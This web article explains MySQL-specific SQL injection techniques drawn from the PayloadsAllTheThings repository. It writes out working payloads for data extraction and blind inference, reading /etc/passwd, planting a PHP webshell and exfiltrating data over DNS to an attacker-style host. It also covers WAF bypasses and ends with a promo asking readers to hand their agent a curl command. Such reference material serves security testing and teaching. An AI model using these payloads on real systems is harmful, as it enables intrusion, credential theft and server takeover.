MySQL Specific SQL Injection Payloads: Techniques and Examples from PayloadsAllTheThings

MySQL specific SQL injection payloads exploit database-specific functions, metadata schemas, and syntax variations to enumerate databases, extract sensitive data, execute system commands, and bypass Web Application Firewalls.

The swisskyrepo/PayloadsAllTheThings repository contains a comprehensive catalog of MySQL specific SQL injection payloads organized by exploitation methodology. These payloads demonstrate how attackers manipulate MySQL's unique behaviors—such as information_schema queries, conditional comments, and file system primitives—to compromise database systems and achieve remote code execution.

Enumeration via Default Databases and Information Schema

MySQL installations ship with built-in schemas that leak system metadata. Attackers target the mysql and information_schema databases to discover table structures, column names, and user privileges before extracting sensitive data.

The information_schema database serves as the primary metadata repository in MySQL. According to the source code in SQL Injection/MySQL Injection.md, attackers query information_schema.schemata, information_schema.tables, and information_schema.columns to map the database architecture. The mysql database contains authentication credentials and privilege tables that enable privilege escalation attacks.

Comment Techniques for Query Truncation

MySQL supports multiple comment syntaxes that allow attackers to truncate query strings or execute version-conditional code. The repository documents four primary comment styles in SQL Injection/MySQL Injection.md:

  • # – Hash comment (single line)
  • -- – Double-dash comment (requires trailing space)
  • /* … */ – Multi-line comment block
  • /*! … */ – Conditional execution comment (executes content only if MySQL version matches)

Attackers use these comments to neutralize trailing query segments. For example, injecting ' OR 1=1 -- effectively comments out password checks or LIMIT clauses in the original query.

Testing Injection Points

Before launching complex attacks, security testers verify injection viability using database-specific strings. The repository distinguishes between string context and numeric context testing in SQL Injection/MySQL Injection.md:

-- String context testing (quote manipulation)
1' AND 1=1 --+
1' AND 1=2 --+

-- Numeric context testing (no quotes required)
1 AND 1=1
1 AND 1=2

These tests reveal how the application parses quotes, backslashes, and boolean logic, determining whether the injection point accepts direct SQL manipulation or requires encoding bypasses.

Union-Based SQL Injection Techniques

Detecting Column Count

Successful UNION SELECT operations require matching the exact column count of the original query. The repository outlines three methods in SQL Injection/MySQL Injection.md for determining column numbers:

  1. Iterative NULL injection – Adding NULL values until the query succeeds: ' UNION SELECT NULL--, ' UNION SELECT NULL,NULL--
  2. ORDER BY enumeration – Using ORDER BY 1, ORDER BY 2 until an error indicates the column limit
  3. LIMIT INTO – Leveraging LIMIT 0,1 INTO @a,@b to test variable assignment

Data Extraction with GROUP_CONCAT

Once column count is established, attackers use MySQL-specific aggregation functions to concatenate multiple rows into a single column response. The GROUP_CONCAT() function bypasses row limitations by combining results:

-1' UNION SELECT NULL,NULL,GROUP_CONCAT(0x7c,schema_name,0x7c) FROM information_schema.schemata--+

For MySQL 5.7 and later, json_arrayagg() provides an alternative that avoids GROUP_CONCAT length limitations, as documented in the WAF bypass section of SQL Injection/MySQL Injection.md.

Error-Based and Blind Injection Methods

Error-Based Data Leakage

When applications display database error messages, attackers force MySQL to embed sensitive data within error output strings. The repository highlights three primary error-based functions in SQL Injection/MySQL Injection.md:

  • EXTRACTVALUE() – Triggers XPath syntax errors containing injected data
  • UPDATEXML() – Generates XML parsing errors with embedded payloads
  • GTID_SUBSET() – Produces GTID set errors that leak data through error messages

Example payload using EXTRACTVALUE:

?id=1 AND EXTRACTVALUE(RAND(),CONCAT(0x7e,VERSION(),0x7e))--+

Boolean-Based Blind Injection

In blind scenarios where no data is returned visibly, attackers infer information through conditional statements. The repository documents boolean inference using IF(), MAKE_SET(), and string comparison operators:

?id=1 AND IF(ASCII(SUBSTRING((SELECT USER()),1,1))>100,1,0)--+

This payload checks if the first character of the database user has an ASCII value greater than 100, revealing one bit of information per request.

Time-Based Delay Inference

When boolean responses are indistinguishable, attackers introduce measurable delays using SLEEP() or BENCHMARK():

-- Delay-based boolean extraction
?id=1 AND IF(ASCII(SUBSTRING((SELECT password FROM users LIMIT 1),1,1))=65, SLEEP(5), 0)--+

-- CPU-intensive delay via BENCHMARK
?id=1 AND BENCHMARK(40000000,SHA1('test'))--+

The BENCHMARK() function executes an expression repeatedly, creating detectable latency without requiring time-based system functions that some WAFs block.

File System Interaction and Code Execution

Reading Arbitrary Files

MySQL's LOAD_FILE() function reads files accessible to the database process, enabling attackers to extract sensitive system files like /etc/passwd or application source code:

?id=1 UNION SELECT LOAD_FILE('/etc/passwd')--+

Writing Webshells via OUTFILE

When the MySQL user possesses FILE privileges and the secure-file-priv configuration permits, attackers write malicious files to the web root using INTO OUTFILE or INTO DUMPFILE:

-- PHP webshell deployment
?id=1 UNION SELECT '<?php system($_GET[cmd]);?>' INTO OUTFILE '/var/www/html/shell.php'--+

INTO DUMPFILE writes binary data without newline conversion, suitable for dropping compiled binaries or encoded payloads, as noted in SQL Injection/MySQL Injection.md.

Advanced MySQL Injection Techniques

DIOS (Dump In One Shot)

The Dump In One Shot technique concatenates entire database contents into a single result set, minimizing HTTP requests. This advanced method uses nested GROUP_CONCAT statements or json_arrayagg() to serialize multiple tables simultaneously, reducing detection footprints compared to iterative extraction.

Out-of-Band (OOB) Exfiltration

When direct output channels are blocked, attackers force MySQL to initiate external connections. The repository documents DNS exfiltration via LOAD_FILE() with UNC paths:

?id=1 LOAD_FILE(CONCAT('\\\\',VERSION(),'.attacker-controlled.com\\a.txt'))--+

This technique also enables NTLM hash theft by forcing Windows systems to authenticate against attacker-controlled SMB shares.

INSERT and ON DUPLICATE KEY Exploitation

In scenarios where injection occurs within INSERT statements, attackers leverage ON DUPLICATE KEY UPDATE to overwrite existing records. This technique effectively resets administrator passwords or escalates privileges by updating existing rows when primary key collisions occur:

INSERT INTO users (email,password) VALUES ('attacker@example.com','pwd'),('admin@example.com','pwd') 
ON DUPLICATE KEY UPDATE password='hacked'--+

Truncation Attack Vectors

When applications enforce column length limits, attackers bypass authentication by exploiting string truncation. Submitting admin@example.com followed by spaces truncated to the column length may match the existing admin account, while the attacker controls the password field, as detailed in SQL Injection/MySQL Injection.md.

WAF Bypass Strategies

The repository catalogs multiple techniques to evade Web Application Firewalls in SQL Injection/MySQL Injection.md:

  • Alternative metadata sources – Querying mysql.innodb_table_stats instead of information_schema.tables when the latter is filtered
  • Version-agnostic variables – Using @@innodb_version or @@version_compile_os to fingerprint systems without VERSION()
  • Encoding tricks – Scientific notation (1e1), conditional comments (/*!50000*/), and wide-byte (GBK) injection using %df' to consume escape backslashes
  • JSON aggregation – Replacing GROUP_CONCAT with json_arrayagg() to bypass function blacklists

Summary

  • MySQL specific SQL injection payloads leverage database-native functions like GROUP_CONCAT, EXTRACTVALUE, and LOAD_FILE to extract data and execute commands.
  • The information_schema and mysql system databases provide complete metadata enumeration capabilities for mapping target architectures.
  • Union-based, error-based, boolean-blind, and time-based techniques provide alternative extraction paths depending on application response behaviors.
  • File system primitives (LOAD_FILE, INTO OUTFILE) enable reading sensitive files and writing webshells when FILE privileges are granted.
  • Advanced evasion uses conditional comments, alternative metadata tables, and wide-byte encoding to bypass Web Application Firewalls and input validation.

Frequently Asked Questions

What are MySQL specific SQL injection payloads?

MySQL specific SQL injection payloads are attack strings that exploit syntax and functions unique to the MySQL database engine, such as GROUP_CONCAT, EXTRACTVALUE, LOAD_FILE, and conditional comments (/*! … */). These payloads target MySQL's information_schema metadata, file system capabilities, and specific error message formats to extract data or execute commands, distinguishing them from generic SQL injection or database-agnostic techniques.

How do you enumerate databases using MySQL injection?

Attackers enumerate MySQL databases by querying the information_schema.schemata table through Union-based or Error-based injection. A typical payload uses GROUP_CONCAT(schema_name) to retrieve all database names in a single response: -1' UNION SELECT NULL,GROUP_CONCAT(0x7c,schema_name,0x7c) FROM information_schema.schemata--+. Alternatively, Blind injection techniques extract names character-by-character using SUBSTRING() and boolean comparisons when direct output is unavailable.

What is the difference between Union-based and Error-based MySQL injection?

Union-based injection requires the application to display query results directly, allowing attackers to append UNION SELECT statements that return arbitrary data alongside legitimate results. Error-based injection works when applications display database error messages but suppress query output; attackers use functions like EXTRACTVALUE() or UPDATEXML() to force MySQL to embed sensitive data within error strings (e.g., XPATH syntax error: '~5.7.38~'). Union-based methods are faster and more efficient, while error-based techniques function in scenarios where result sets are hidden but verbose errors leak to the user interface.

How do you bypass WAF filters in MySQL injection attacks?

WAF bypass techniques for MySQL injection include using alternative metadata tables like mysql.innodb_table_stats instead of filtered information_schema tables, employing json_arrayagg() instead of blacklisted GROUP_CONCAT(), and utilizing conditional comments (/*!50000*/) to obfuscate keywords. Wide-byte encoding using %df' consumes backslash escape characters in GBK character sets, while scientific notation (1e1) and version-specific conditional execution (/*!50718 SELECT*/) evade pattern-matching signatures.

Have a question about this repo?

These articles cover the highlights, but your codebase questions are specific. Give your agent direct access to the source. Share this with your agent to get started:

Share the following with your agent to get started:
curl -s "https://instagit.com/install.md"

Works with
Claude Codex Cursor VS Code OpenClaw Any MCP Client

Maintain an open-source project? Get it listed too →